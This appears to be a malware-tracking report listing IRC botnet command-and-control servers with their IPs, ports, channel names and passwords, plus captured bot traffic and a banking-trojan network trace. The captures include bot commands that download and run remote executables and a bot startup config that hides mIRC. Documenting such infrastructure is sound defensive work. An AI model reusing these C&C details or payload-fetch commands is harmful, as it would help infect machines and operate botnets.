Domain names used to control the botnet:
hdp.zapto.org 46.166.141.149 active
1n1.sytes.net 213.155.7.39 active
hdp.zapto.org not active
hgjma1.biz not active
jma1.biz not active
mooo.com 72.8.150.1 active
n1.mooo.com 86.35.19.116 active
fhdp.zapto.org
Remote Host Port Number
199.15.234.7 80
50.22.107.93 80
213.155.7.39 2009
PASS ngr
NICK n{US|XPa}dcbcoox
USER dcbcoox 0 0 :dcbcoox
JOIN #juaz ngrBot
PRIVMSG #juaz :[d="http://creatucurso.net/facu/mx.exe" s="198683
216.246.78.247 (irc bot hosted in United States New York Hostforweb Inc)
Remote Host Port Number
216.246.78.247 2345
NICK New[USA|00|P|75060]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-9002 * 0 :COMPUTERNAME
MODE New[USA|00|P|75060] -ix
JOIN #!loco!
PONG 22
MOTD
hosting infos: http://whois.domaintools.com/216.246.78.247
tool.manitam.com (mIRC bots hosted in United Kingdom Redstation Limited)
tool.manitam.com 176.227.199.27
dslb-088-065-091-000.pools.arcor-ip.net 88.65.91.0
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
C&C Server: 176.227.199.27:6669
Server Password:
Username: m0x
Nickname: [x0x]XP92288
Channel: #d0x (Password: )
Channeltopic:
Bot Config: On *:start: { .Nickler .server tool.manitam.com 6669 .timer 0 0 BoTNeT .dll dmu.dll HideMirc
mysticalisboss.info (2k ngrBots hosted in Netherlands Amsterdam Ecatel Ltd)
The noob behind this net is a very big hf hecker named Mystical.
Remote Host Port Number
199.15.234.7 80
80.82.66.220 6667
Local users: Current Local Users: 1199 Max: 2019
Global users: Current Global Users: 1199 Max: 2019
PONG :B070CCDD
JOIN #Techno
PONG :Unreal.ircd
NICK n{US|XP-32a}ffmidty
USER ffmidty 0 * :ffmidty
Other channels: #gBot 8 [+sntu]
pandafix.com.br (Banking Trojan hosted in Brazil Caxias Do Sul Comite Gestor Da Internet No Brasil)
This malware injects into notepad.exe.
notepad.exe – Network Activity
– DNS Queries:
dl.dropbox.com DNS_TYPE_A 50.16.240.166 107.20.132.92 107.20.134.231 107.20.135.122 107.20.207.68 174.129.232.94 184.73.245.80 23.21.195.136
www.comeciosilvaa.com.br DNS_TYPE_A 200.98.197.80 YES udp
www.pandafix.com.br DNS_TYPE_A 187.17.98.44 YES udp
– HTTP Conversations:
50.16.240.166:80 – [dl.dropbox.com] Request: GET /u/56787160/index.html Response: 200 "OK"
200.98.197.80:80 – [www.comeciosilvaa.com.br] Request: POST /avisosgordim/index.php Response: 404 "Not Found"
187.17.98.44:80
199.19.105.67 (ngrBot hosted in United States Clarks Summit Volumedrive)
Remote Host Port Number
199.15.234.7 80
200.121.52.63 80
199.19.105.67 1085
PASS mypass
NICK n{US|XPa}wwphlrx
USER wwphlrx 0 0 :wwphlrx
JOIN #boss secret
PRIVMSG #boss :[DNS]: Blocked 0 domain(s) – Redirected 6 domain(s)
[#boss] [ Topic: !up http://www.bairesac.com/exploradore.exe 190416f04cfb5877642f69b8f59708dd ]
hosting infos: http://whois.domaintools.com/199.19.105.67
46.166.140.140 (ngrBot hosted in United States Amsterdam Santrex Internet Services Ltd)
Remote Host Port Number
199.15.234.7 80
46.166.140.140 6667
PASS secret
Clients: I have 111 clients and 0 servers
Local users: Current Local Users: 111 Max: 205
Global users: Current Global Users: 111 Max: 205
NICK n{US|XPa}mthtknh
USER mthtknh 0 0 :mthtknh
JOIN #bone peruch
Now talking in #bone
Joins: {ESP|XPa}tyxdvpo [tyxdvpo@594ABF0E.765DC855.6CB32CB6.IP]
Joins: {PE|W7u}ldbnzwu 12[15ldbnzwu@22B3CEAE.9F16B729.F84BD3C2.IP]
hosting
108.163.164.154 (irc botnet hosted in Canada Verdun Iweb Technologies Inc)
Remote Host Port Number
108.163.164.154 1863
MODE {XPUSA706826} -ix
PRIVMSG #per1 : 14,1. 15:: 11iMBot 9[Actualizacion] Iniciando descarga: 63.5KB a: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_02130.exe @ 31.8KB/sec.
QUIT 3,1 Actualizando al nuevo binario
NICK {XPUSA48968}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XPUSA48968} -ix
JOIN #per
JOIN #per1
hosting infos: http://whois.domaintools.com/108.163.164.154
fasterthanhim.com (ngrBot hosted in Russian Federation Llc Komplit Plyus)
Domains used for the botnet:
chicken1000.mooo.com 127.0.0.2 not active yet
api.wipmania.com 199.15.234.7
fasterthanhim.com 91.226.78.31 active
sad-stone.com NONE not active yet
sad-stone.com.local NONE not active yet
C&C Server: 91.226.78.31:8765
Server Password:
Username: dxvzrjf
Nickname: n{DE|XPa}dxvzrjf
Channel: #GODS (Password: secret)
Channeltopic: :~up http://www.emprender.edu.co/media/system/js/war.exe 24e3da41454dcbe517037d306c644245 ~mdns http://www.farmaciavirtual.com.co/pruebas/z.txt
sample here and here
hosting infos: http://whois.domaintools.com/91.226.78.31
37.59.74.224 (irc botnet hosted in OVH ISP Paris, France)
Remote Host Port Number
37.59.74.224 6665
PASS google_cache2.tmp
NICK new[fbe-XP-USA]286504
USER 0348 "" "TsGh" :0348
PONG :901E418A
JOIN #G u12344u
Now talking in #G
Topic On: [ #G ] [ ]
Topic By: [ inm ]
Joins: [fbe-XP-YEM]541433 [5414@0wn3d-F3F21148.dynamic.yemennet.ye]
Joins: [fbe-XP-SAU]731906 [4962@84EEFA9B.2199BF6.97E20028.IP]
Joins: [fbe-XP-SAU]000244 [0002@37AB46F7.7A8C2D64.C25393E1.IP]
Joins: [fbe-XP-SAU]737710 [7377@C250848.3BBB233E.5822195F.IP]
Joins: [fbe-XP-SAU]372114 [3721@DFD745AA.8F1AA4B1.A97334FE.IP]
Joins: [fbe-W7-USA]180197 [0792@4A76F5E6.CCDF15C9.3AA76D10.IP]
hosting